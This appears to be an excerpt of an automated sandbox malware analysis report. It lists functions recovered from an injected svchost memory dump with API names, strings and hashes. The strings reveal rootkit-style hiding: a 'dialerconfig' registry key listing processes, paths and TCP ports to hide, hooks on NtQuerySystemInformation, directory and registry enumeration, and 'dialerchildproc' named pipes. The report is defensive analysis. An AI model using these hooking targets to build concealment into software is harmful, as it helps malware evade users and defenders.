                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 1627250a6f1587746d6adcb486bc21ae0d1f8d3e6a0bb4f849c2ff22e67d6bd2
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: DC61F0B2F016908BDB548F25D0487ADB3AEFB55FA4F688121DE5907788DF38D89AC701

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 517c12f0b0e1090de60bb0fcc7bf1fefb46beb5eab338aff40a4245cd4b9731a
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 52B17C72B10A9087EB649F35D64C7A963E9F746F86F485016EE0A63B94DF39CC48C381
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: cc74eacb843f1603229d41cad126e5c04d88afadf7cf4452611ec155d591a17a
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: E5315072705B808AEB609F60E8483ED73A8F785B44F484429DA8E67B94EF7CC54DC710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 36f9f4375d1256616007857bae393de0df9f8980b3b202d925a5ac7eb32d36a2
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 4A316F32714F8086DB60CF25E84839E73A8F78AB55F580125EA9E53B68DF7CC159CB41

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: c27f832fced2d29170b0e4fb301a485cb6098ecabde165e8eb95b814a7a813c5
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: BA71F476B10E5087EB10DF65E89D69933B8FB8AF8DF081121DA4F67A68DF28C548C341

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 5c01c19bc0298f85c8339ea94e196dd5b5f1323890ee4be88120aa0ba9bb59bc
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F0512776A14B8487EB50CFA2E44D35AB7B9F78AF89F094124DA4A27728DF7CC049C741

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 147c2e2ec541b53145e726b289546c28288565d736413d3e5244b9f1f05d4738
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 8A31A064B10A5AA3EA04EBA5ED5E6D423A9B717F49F8C4113940B331659F3CC24DC3D2

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e87bf346922b52b2af9168f1f418e053012b6a09ee5fcf7955fafdcfd6fac762
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 0D81CE21F106818BFA54AB66D48D399329DAF87F80F5C8125DA4987796EF3CC9CD8703

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002A66130CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEBC
                                                        • SetLastError.KERNEL32 ref: 000002A66130CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002A66130ECCC,?,?,?,?,000002A66130BF9F,?,?,?,?,?,000002A661307AB0), ref: 000002A66130CF2C
                                                          • Part of subcall function 000002A66130D6CC: HeapAlloc.KERNEL32 ref: 000002A66130D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF54
                                                          • Part of subcall function 000002A66130D744: HeapFree.KERNEL32 ref: 000002A66130D75A
                                                          • Part of subcall function 000002A66130D744: GetLastError.KERNEL32 ref: 000002A66130D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF76
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: a3ebcece3df98fd1e9725f906f8bf8db5f5c64855dc8a79f9fd7b15e885684d0
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 77417420F0128443FA68A735595D36922DD5B47FB2F1C4764A93B376E6DF2C980D8393

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 9e913e5ef9d9d4dd90f3ca067dd4efb44e8ac8cefc28dc1332a14b226ca3e093
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 6C213A72B18A9083EB10CB65E54D35A73A4F78ABA5F580215EA5A13AA8CF7CC149CB41

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 681959dd6542599d6789764f186a42efd8a6d505218f830932f82b8ebb8010d4
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: C1E17C32F04B808BEB609B65D45839D77ACFB56B98F181115EE8957B99CF38C0E9C702

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: f9dc5a9824cbe41745e6e6afb53450f4abea2dc5f6e99ba2920a5b912b4b268f
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: AEE19F72B047448BEB20DF25A44C39D7BE8F746B99F084115DE8A67BA5CF38C189C782

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: fa6adfc857896f79626ba7455a121a59232fbacac11bf9aa969e94737a29d1b3
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 2241E122B15A0083EA16DB56A80C75533DDBB46FE1F0E41259D0BB7784EF3CC44D838A

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 2a66130104c (executed / not-executed block colouring not recoverable); blocks call RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap and HeapFree
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 29549edc3a05bb9f30fb41ffd792d5d1f480f0e7d2fd4d10c68227b69ff2f9b1
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 2B418B72614B80C7E764CF61E44839A77B5F389F89F488129DA8A17B58DF3CC489CB41
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: bc4377a1b8938ee1d589c6b188f15fe87120af383a10576ee3c01281e8991c6e
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: F2118620F0428443FA68A735595D36962DD5B46FF1F1C4324993B277DADF2CC40A8686
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 94d9e67a34e61d90d8dc91a526529cd9d217a7a82295564c3aa49440afe65ca8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 79810230F0064187FA50AB69984D39966ECAB87F82F1C44249A8B73396DF3DC84D8783
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 50e13fa17c3bf59197d400e801c98b0be272adff0d23520052f25ab3404dd5bc
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 3F319021B12A40A3EE11DF46A80C76562DCB74AFA1F5D05259D1F6B790DF3DC849C392
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: ff65df3e6d8c9de4419cb773b33199b337b810cada23280e1cd4933ea371c746
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 8A116D32B14B8087E7509B52E84D31976B8F78AFE4F084224EA5F97794CF7CC8188781
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 025d1bc40c232432275dae4ecc1318edf57f0e1ebcf64f5229914e418f725714
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: F8115B76B04B8187EF149B62E40C66976B8FB8AF85F480029DE8E17794EF3DC609C705
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 5f5900bbcb72c6ae03449aabeaeaebc51276a3d35255987f9de81e93377eb069
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 3BD1B836604B8882EA70DB0AE49835A77F4F389F85F144216EACE57BA5CF3DC545CB81
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 0dbaea95a655bbe900e3289c597c93d81e3b199630ae2b61a37e5e2c9be7583f
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: AA31BF32B01B5183EA10DF66A64C76A67E8FB46FC5F0C40249E4A17B55EF3CC4A98381
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 0c3f37101a929da6b2ab2e1659a4edb589a4527edbf683f148d599b530f189ca
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: A4116020B0028443FA64A7315A5D72962DE6B86FF1F1C4724A937676D6DF6C84098783
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 471f3759c9f5d2bef42bfea3fd4cb3963e2dd95c959e6c4d1128e52080657580
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: C4015771B00A8083EA50DB92A85C35AA3A9F789FC5F884035DE8A63764DF7CC98DC741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 79ca0cd446847db94c87b220a4133f292dc0ecc6b103301cedece9ec62c6ad04
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: B8011BB5B15B8087EB249B62E80D71972B8BB46F86F080424CA4A27754EF7DC50CC742
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 077875c1ecc3ba653c40cf27df437926aa55189474758356bf14258b29207a20
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: AC517C32B0160087EB18DF15E84CB5937DAF346F99F198528DA5B63788EF79C849C782
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: ba38e771323935cd7c4c993903e564a77b026bca2c24c40e091b995464114721
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 39315432B0064087E714DF12E84CB1977A9F386F89F0A8418EA5B23789DF79C948C786
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: b1b7e669e6661b3feae12b7b33b5b685191a7800304716cf001d880ba287570f
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 07F08C72B0468083FB208B60E88C35A63B9F749F88F888024DA4A57964DF6CC68DCB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: cf77e8b58ec68dbf932fe7d168add0dfe5d0c02535d993d737ff7324a50749b0
